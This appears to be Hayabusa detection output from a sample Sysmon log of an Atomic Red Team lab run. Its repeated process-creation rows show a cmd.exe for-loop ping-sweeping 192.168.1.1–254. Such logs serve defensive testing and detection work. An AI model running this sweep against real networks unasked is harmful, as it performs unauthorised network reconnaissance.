+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 
